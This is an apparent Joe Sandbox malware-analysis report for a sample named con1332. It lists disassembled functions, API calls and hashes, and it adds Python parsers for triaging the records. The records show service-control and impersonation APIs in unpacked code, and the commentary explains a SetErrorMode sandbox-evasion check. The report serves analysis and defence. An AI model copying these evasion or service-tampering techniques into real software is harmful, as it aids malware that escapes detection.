0x0040b706 0x0040b715 0x0040b723 0x0040b725 0x0040b727 0x0040b73a 0x0040b73c 0x0040b725
0x0040b704 0x0040b6cf 0x0040b742 0x00000000 0x00000000 0x00000000 0x00000000 0x0040af7b
0x0040af8b 0x00000000

APIs
• _malloc.LIBCMT ref: 0040AF80
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
• std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
• __CxxThrowException@8.LIBCMT ref: 0040AFC5
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1411284514-0
                                                                                                                                                                                                                                    • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                                                                                                                    • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph: 3 basic blocks, 2bf0e0f-2bf0e24 (SetErrorMode x2), 2bf0e26, 2bf0e2b-2bf0e2c; edges 285->286, 285->287, 287->286
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,02BF0223,?,?), ref: 02BF0E19
• SetErrorMode.KERNELBASE(00000000,?,?,02BF0223,?,?), ref: 02BF0E1E
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 493a6c6bdc8abdcb9cbbc839ae6066722017b708e17f1d27ef97698133936497
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 64D01231545128B7D7403A94DC09BCD7B1CDF09B66F008451FB0DD9481C770954046E5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: 2 basic blocks, 40e7ee-40e7f6 (call 40e7c3) -> 40e7fb-40e7ff (ExitProcess); edge 288->290
C-Code - Quality: 100%
			E0040E7EE(int _a4) {
				// MSVC CRT __crtExitProcess(status): first give a loaded CLR
				// (mscoree.dll) the chance to shut down through CorExitProcess,
				// then terminate the process with the same exit status.
				E0040E7C3(_a4); // executed; 0x0040e7f6, __crtCorExitProcess(status)
				ExitProcess(_a4); // 0x0040e7ff
			}

APIs
• ___crtCorExitProcess.LIBCMT ref: 0040E7F6
  • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
  • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
  • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
• ExitProcess.KERNEL32 ref: 0040E7FF
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: ExitProcess$AddressHandleModuleProc___crt
• String ID:
• API String ID: 2427264223-0
• Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
• Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
• Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
• Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: basic blocks 291-368 from 46ba1a8 to 46ba56c; ChangeServiceConfigA is called in block 335 (46ba439-46ba4b0)
APIs
• ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 046BA4A0
Memory Dump Source
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
Similarity
• API ID: ChangeConfigService
• String ID:
• API String ID: 3849694230-0
• Opcode ID: 4b9ef7a1522bb4a26c328f085fbdaa7197e8f3c39a593616f4bb00f44fd82c19
• Instruction ID: df60bd62f6690b94dc97205882bc4780b59357463df339872004635b79d96dcc
• Opcode Fuzzy Hash: 4b9ef7a1522bb4a26c328f085fbdaa7197e8f3c39a593616f4bb00f44fd82c19
• Instruction Fuzzy Hash: 68C14A71D107199FDB10CFA8C9857EEBBF2BB44314F148629E895E7384EB74A981CB81
Uniqueness
Uniqueness Score: -1.00%
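Every function entry in this report uses the same fixed layout: a control-flow-graph line whose first block range is the function's start address, an "APIs" list of "Name.MODULE(args), ref: ADDR" lines (indented "Part of subcall function" lines for APIs reached indirectly), and a "Memory Dump Source" line that names the dump region and says whether it is backed by a PE image. Reading thousands of such entries by hand is impractical, so here is an added example, not part of the Joe Sandbox report, of a parser that turns the text export into records and pulls out the functions that call a watched API directly, together with the region they live in. It also flags the SetErrorMode(00000400) followed by SetErrorMode(00000000) pair seen in the 02BF0000 entry above: with the branch that follows it, that is the shape of a known analysis-environment check (the second call returns the mode the first one set, and a hooked or emulated SetErrorMode that does not preserve it gives the probe away). The watch-list, which groups the ADVAPI32 service-control calls found in the non-PE-backed 046B0000 region with that pair, is this example's own assumption, and SAMPLE is constructed from abbreviated excerpts of the entries above.

```python
"""Added example, not code from the Joe Sandbox report: a parser for the
per-function "APIs" / "Memory Dump Source" listing printed for each disassembled
function, so the entries can be triaged by API and memory region. SAMPLE is
constructed from abbreviated excerpts of the entries above; WATCH is an assumption."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One "• Name.MODULE(args), ref: ADDR" line, optionally reached through a subcall.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# The first "start-end" block range on the graph line is the function's start address.
CFG_RE = re.compile(r"^(?:control_flow_graph|Control-flow Graph:).*?\b(?P<start>[0-9a-f]{5,8})-[0-9a-f]{5,8}\b")
SRC_RE = re.compile(r"Source File:.*?Offset:\s*(?P<off>[0-9A-Fa-f]+), based on PE:\s*(?P<pe>true|false)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                   # address of the call instruction
    via: Optional[str] = None  # subcall the API is reached through, if any

@dataclass
class FunctionEntry:
    start: Optional[int] = None
    region: Optional[int] = None         # base of the memory dump holding the function
    backed_by_pe: Optional[bool] = None  # False: dump without a PE header (unpacked code)
    apis: list = field(default_factory=list)

def parse_report(text: str) -> list:
    """Split the listing at each "Control-flow Graph" header and collect each entry's
    fields; an entry with no header (like the truncated first one above) is skipped."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Control-flow Graph"):
            cur = FunctionEntry()
            entries.append(cur)
        if cur is None:
            continue
        if (m := CFG_RE.match(line)) and cur.start is None:
            cur.start = int(m.group("start"), 16)
        elif m := SRC_RE.search(line):
            cur.region, cur.backed_by_pe = int(m.group("off"), 16), m.group("pe") == "true"
        elif m := API_RE.match(line):
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    int(m.group("ref"), 16), m.group("sub")))
    return entries

def arg_value(s: str) -> Optional[int]:
    """Numeric argument value, or None for "?" (value not recovered by the analyzer)."""
    return int(s, 16) if re.fullmatch(r"-?[0-9A-Fa-f]+", s) else None

def errormode_probe(entry: FunctionEntry) -> bool:
    """True when the function itself calls SetErrorMode(non-zero) and then SetErrorMode(0):
    the shape of the known analysis-environment check that tests whether the second
    call returns the mode the first one set."""
    modes = [arg_value(c.args[0]) for c in entry.apis
             if c.via is None and c.name == "SetErrorMode" and c.args]
    return any(a not in (None, 0) and b == 0 for a, b in zip(modes, modes[1:]))

# Assumed watch-list: the service-control calls seen in the non-PE-backed 046B0000
# region above, plus the SetErrorMode pair from the 02BF0000 region.
WATCH = frozenset({"OpenServiceA", "ChangeServiceConfigA", "SetErrorMode"})

def triage(entries: list, watch=WATCH) -> list:
    """One record per function that calls a watched API directly (not only through
    a subcall), with the dump region it was found in."""
    return [{"start": e.start, "region": e.region, "pe_backed": e.backed_by_pe,
             "apis": direct, "errormode_probe": errormode_probe(e)}
            for e in entries
            if (direct := sorted({c.name for c in e.apis if c.via is None and c.name in watch}))]

# Constructed sample: abbreviated excerpts of three entries from this report.
SAMPLE = """\
Control-flow Graph
control_flow_graph 285 2bf0e0f-2bf0e24 SetErrorMode * 2 286 2bf0e2b-2bf0e2c 285->286 287 2bf0e26 285->287 287->286
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,02BF0223,?,?), ref: 02BF0E19
• SetErrorMode.KERNELBASE(00000000,?,?,02BF0223,?,?), ref: 02BF0E1E
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Control-flow Graph
control_flow_graph 288 40e7ee-40e7f6 call 40e7c3 290 40e7fb-40e7ff ExitProcess 288->290
APIs
• ___crtCorExitProcess.LIBCMT ref: 0040E7F6
  • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001), ref: 0040E7CD
• ExitProcess.KERNEL32 ref: 0040E7FF
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
Control-flow Graph
control_flow_graph 369 46b99e8-46b9a49 371 46b9a4b-46b9a55 369->371 372 46b9a82-46b9ad2 OpenServiceA 369->372
APIs
• OpenServiceA.ADVAPI32(?,?,?), ref: 046B9AC2
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
"""
```

Feed `triage(parse_report(text))` the text export of the whole report: each hit carries the function start, the dump base, whether that dump was PE-backed, the watched APIs the function calls itself, and whether it has the SetErrorMode probe shape. Calls that are only reached through a subcall are kept in `FunctionEntry.apis` with their `via` address but are deliberately not counted as hits, so the same API is attributed once, to the function that actually issues it.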

Control-flow Graph: basic blocks 369-386 from 46b99e8 to 46b9b1c; OpenServiceA is called in block 372 (46b9a82-46b9ad2)
APIs
• OpenServiceA.ADVAPI32(?,?,?), ref: 046B9AC2
Memory Dump Source
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
Similarity
• API ID: OpenService
• String ID:
• API String ID: 3098006287-0
• Opcode ID: f6b8f9c21856c4d7b3361802341968c8e8679c1b09885d979a09c829a4ee469c
• Instruction ID: ecbe97bec7b968c3fbfcb67ee730797789e4c7b9240c187e97cb5663bf41a15e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6b8f9c21856c4d7b3361802341968c8e8679c1b09885d979a09c829a4ee469c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F3168B1D002589FDB10CFA9C984BDEBBF1BF48304F148529E855AB340E774A889CF91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 387 46b9920-46b996f 389 46b9971-46b9974 387->389 390 46b9977-46b997b 387->390 389->390 391 46b997d-46b9980 390->391 392 46b9983-46b99b2 OpenSCManagerW 390->392 391->392 393 46b99bb-46b99cf 392->393 394 46b99b4-46b99ba 392->394 394->393
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 046B99A5
Memory Dump Source
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
• Opcode ID: d47bd990afc756254357d2d3e98edec3613c81499ff67100d341e193dafede65
• Instruction ID: 6e1d92918ca5aaa47717cf867b4808476ccbe78f8ea57eabe4cf87a29a94a21a
• Opcode Fuzzy Hash: d47bd990afc756254357d2d3e98edec3613c81499ff67100d341e193dafede65
• Instruction Fuzzy Hash: A82135B6C002088FCB50CFAAD884BDEFBF4EF88314F14811AD908AB344D774A944CBA1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 396 46b9180-46b9201 VirtualProtect 399 46b920a-46b922f 396->399 400 46b9203-46b9209 396->400 400->399
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 046B91F4
Memory Dump Source
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: ede9ce074f0e8b497325f4f8ed31ba780efd80c13269aa10c299732549b123e4
• Instruction ID: b7ec714e46f13e90f19e33f9887ace432b172190cd4eed3d8014a9c177c2ae31
• Opcode Fuzzy Hash: ede9ce074f0e8b497325f4f8ed31ba780efd80c13269aa10c299732549b123e4
• Instruction Fuzzy Hash: FE1124B5D002098BDB10CFAAC884ADFFBF5AF48314F14842AD469A7250D779A945CFA1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 404 46ba0e8-46ba165 ControlService 406 46ba16e-46ba18f 404->406 407 46ba167-46ba16d 404->407 407->406
APIs
• ControlService.ADVAPI32(?,?,?), ref: 046BA158
Memory Dump Source
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
Similarity
• API ID: ControlService
• String ID:
• API String ID: 253159669-0
• Opcode ID: d81489e17905cb3c6c6bb92e8316ef515a3c317a2de0a738fb60c5e3742300a5
• Instruction ID: b47bc5d9b3e6edb5c66466b4579949b86403aac9671b77972b2e972c6eb18df6
• Opcode Fuzzy Hash: d81489e17905cb3c6c6bb92e8316ef515a3c317a2de0a738fb60c5e3742300a5
• Instruction Fuzzy Hash: 9A11E4B59002099FDB10CF9AD984BDEFBF4EB48314F10842AE558A7350D378A945CFA5
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 409 46b9350-46b93bf FindCloseChangeNotification 412 46b93c8-46b93ed 409->412 413 46b93c1-46b93c7 409->413 413->412
APIs
• FindCloseChangeNotification.KERNELBASE ref: 046B93B2
Memory Dump Source
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 1ad8ac91917bed7f2efdfc17365027703f5931f0d2af332ceb92490002e56522
• Instruction ID: b9be13994dd897bddf577f68a8211ce85fafc61c1b44909819c7c9649773234e
• Opcode Fuzzy Hash: 1ad8ac91917bed7f2efdfc17365027703f5931f0d2af332ceb92490002e56522
• Instruction Fuzzy Hash: 5B1158B59003088BDB10CFAAC8447DFBBF5AF88314F148419C459A7250C779A944CBA1
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 417 46b9cc8-46b9d34 FindCloseChangeNotification 419 46b9d3d-46b9d5e 417->419 420 46b9d36-46b9d3c 417->420 420->419
APIs
• FindCloseChangeNotification.KERNELBASE ref: 046B9D27
Memory Dump Source
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: f310a61d157b8196db919fd448d569061c1127b564f5fa8f0fad08d24f071b63
• Instruction ID: f6b4843d601395107c88666895ed965847e799e0cc9d6e4f1669c71a29fc39e0
• Opcode Fuzzy Hash: f310a61d157b8196db919fd448d569061c1127b564f5fa8f0fad08d24f071b63
• Instruction Fuzzy Hash: 171148B58002098FDB20CF9AC944BDEFBF4EF48324F10845AD558A3250D778A984CFA1
Uniqueness
• Uniqueness Score: -1.00%
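The control_flow_graph lines in the records above are the plugin's flattened serialization of each function's basic blocks and edges, and they are hard to read by eye once a function has more than a handful of blocks. The Python below is an added example, not part of the Joe Sandbox report or of the IDA plugin, that parses that serialization into blocks and edges and answers the questions an analyst asks of it: the function's address extent, its entry and exit blocks, which block contains the API call at the ref: address of the same record, and whether the function loops. The grammar it assumes (a decimal block id followed by a hex start-end range, or by a bare address for a one-instruction block such as "380 46b9a67"; API names trailing the block they sit in; edges written as src->dst) is inferred from the lines on this page, not from a published format description. The names parse_cfg, Cfg, block_for and summarize are mine; the two sample lines are copied verbatim from the OpenServiceA and OpenSCManagerW records.

```python
"""Parse the flattened control_flow_graph lines emitted per function by the
Joe Sandbox IDA plugin into blocks and edges, then summarize each function.

Assumed grammar (inferred from the report text, not a published spec):
  control_flow_graph (NODE | EDGE)*
  NODE := <decimal id> <hex start>-<hex end> [<API name> ...]
        | <decimal id> <hex addr>                 (one-instruction block)
  EDGE := <decimal id>-><decimal id>
"""
import re
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


@dataclass
class Cfg:
    blocks: dict = field(default_factory=dict)   # id -> (start, end) as ints
    labels: dict = field(default_factory=dict)   # id -> [API names shown in the block]
    edges: list = field(default_factory=list)    # (src id, dst id)

    def entries(self):
        targets = {d for _, d in self.edges}
        return sorted(n for n in self.blocks if n not in targets)

    def exits(self):
        sources = {s for s, _ in self.edges}
        return sorted(n for n in self.blocks if n not in sources)

    def extent(self):
        return (min(s for s, _ in self.blocks.values()),
                max(e for _, e in self.blocks.values()))

    def back_edges(self):
        """Loop-closing edges: DFS from each entry, an edge to a block still on the stack."""
        succ = {}
        for s, d in self.edges:
            succ.setdefault(s, []).append(d)
        found, on_stack, done = [], set(), set()

        def visit(n):
            on_stack.add(n)
            for d in succ.get(n, []):
                if d in on_stack:
                    found.append((n, d))
                elif d not in done:
                    visit(d)
            on_stack.discard(n)
            done.add(n)

        for e in self.entries():
            visit(e)
        return found


def parse_cfg(line):
    tokens = line.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    cfg, pending, last = Cfg(), None, None
    for tok in tokens[1:]:
        m = EDGE_RE.match(tok)
        if m:
            cfg.edges.append((int(m.group(1)), int(m.group(2))))
        elif pending is not None:                # address (range) of the id just seen
            m = ADDR_RE.match(tok)
            if not m:
                raise ValueError(f"node {pending}: bad address token {tok!r}")
            start = int(m.group(1), 16)
            end = int(m.group(2), 16) if m.group(2) else start
            cfg.blocks[pending] = (start, end)
            last, pending = pending, None
        elif tok.isdigit():                      # a new block id
            pending = int(tok)
        elif last is not None:                   # API name shown inside the last block
            cfg.labels.setdefault(last, []).append(tok)
        else:
            raise ValueError(f"unexpected token {tok!r}")
    if pending is not None:
        raise ValueError(f"node {pending} has no address")
    return cfg


def block_for(cfg, addr):
    """Map an address (e.g. the 'ref:' of an API call) to the block id containing it."""
    for n, (start, end) in cfg.blocks.items():
        if start <= addr <= end:
            return n
    return None


def summarize(line):
    cfg = parse_cfg(line)
    lo, hi = cfg.extent()
    return {"blocks": len(cfg.blocks), "edges": len(cfg.edges),
            "range": f"{lo:x}-{hi:x}", "entries": cfg.entries(), "exits": cfg.exits(),
            "api_blocks": dict(cfg.labels), "back_edges": cfg.back_edges()}


# Copied verbatim from the OpenServiceA and OpenSCManagerW records of this report.
OPEN_SERVICE_LINE = (
    "control_flow_graph 369 46b99e8-46b9a49 371 46b9a4b-46b9a55 369->371 372 46b9a82-46b9ad2 "
    "OpenServiceA 369->372 371->372 373 46b9a57-46b9a59 371->373 377 46b9adb-46b9b0c 372->377 "
    "378 46b9ad4-46b9ada 372->378 374 46b9a5b-46b9a65 373->374 375 46b9a7c-46b9a7f 373->375 "
    "379 46b9a69-46b9a78 374->379 380 46b9a67 374->380 375->372 384 46b9b0e-46b9b12 377->384 "
    "385 46b9b1c 377->385 378->377 379->379 382 46b9a7a 379->382 380->379 382->375 384->385 "
    "386 46b9b14 384->386 386->385")
OPEN_SCM_LINE = (
    "control_flow_graph 387 46b9920-46b996f 389 46b9971-46b9974 387->389 390 46b9977-46b997b "
    "387->390 389->390 391 46b997d-46b9980 390->391 392 46b9983-46b99b2 OpenSCManagerW 390->392 "
    "391->392 393 46b99bb-46b99cf 392->393 394 46b99b4-46b99ba 392->394 394->393")

if __name__ == "__main__":
    for name, line, ref in (("OpenServiceA", OPEN_SERVICE_LINE, 0x046B9AC2),
                            ("OpenSCManagerW", OPEN_SCM_LINE, 0x046B99A5)):
        print(name, summarize(line), "call in block", block_for(parse_cfg(line), ref))
```

Run as a script it prints both summaries. For the OpenServiceA function it reports 14 blocks with a single exit block (385), one back edge (the self-loop 379->379 visible in the raw line), and places the call at 046B9AC2 in block 372, which is the block the raw line labels OpenServiceA; the OpenSCManagerW function has no back edges and its call lands in block 392.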

Control-flow Graph
control_flow_graph 422 46b9ed8-46b9f44 ImpersonateLoggedOnUser 424 46b9f4d-46b9f6e 422->424 425 46b9f46-46b9f4c 422->425 425->424
APIs
• ImpersonateLoggedOnUser.KERNELBASE ref: 046B9F37
Memory Dump Source
• Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
Similarity
• API ID: ImpersonateLoggedUser
• String ID:
                                                                                                                                                                                                                                    • API String ID: 2216092060-0
                                                                                                                                                                                                                                    • Opcode ID: 119d9923c2b769d1e7059f9ba7aede2255e389720d43df10d63f6d1a27c8e64b
                                                                                                                                                                                                                                    • Instruction ID: 6364a3a93dd7cd11a233e7deb3f9eca6f649b11fea964167878f54d64b699049
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 119d9923c2b769d1e7059f9ba7aede2255e389720d43df10d63f6d1a27c8e64b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B1136B1800209CFDB20CF9AC944BDEBBF8EF48324F10845AD558A3250D778A985CFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040D534(intOrPtr _a4) {
	void* _t6;

	_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
	*0x4234b4 = _t6;
	if(_t6 != 0) {
		*0x4250b0 = 1;
		return 1;
	} else {
		return _t6;
	}
}

APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
• Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 25%
E0040EA0A(intOrPtr _a4) {
	void* __ebp;
	void* _t2;
	void* _t3;
	void* _t4;
	void* _t5;
	void* _t8;

	_push(0);
	_push(0);
	_push(_a4);
	_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
	return _t2;
}

APIs
• _doexit.LIBCMT ref: 0040EA16
  • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
  • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
  • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: __decode_pointer$__initterm$__lock_doexit
• String ID:
• API String ID: 1597249276-0
• Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
• Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
Uniqueness

Uniqueness Score: -1.00%

APIs
• TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02BF0929
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: ProcessTerminate
• String ID:
• API String ID: 560597551-0
• Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
• Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
• Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
• Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 85%
// Editor's annotation (not part of the sandbox output): the shape of this routine is the
// MSVC CRT's /GS stack-cookie check and failure handler: __security_check_cookie (the compare
// and "rep ret" at 0x0040ce09) falling through into __report_gsfailure (0x00413644 onwards),
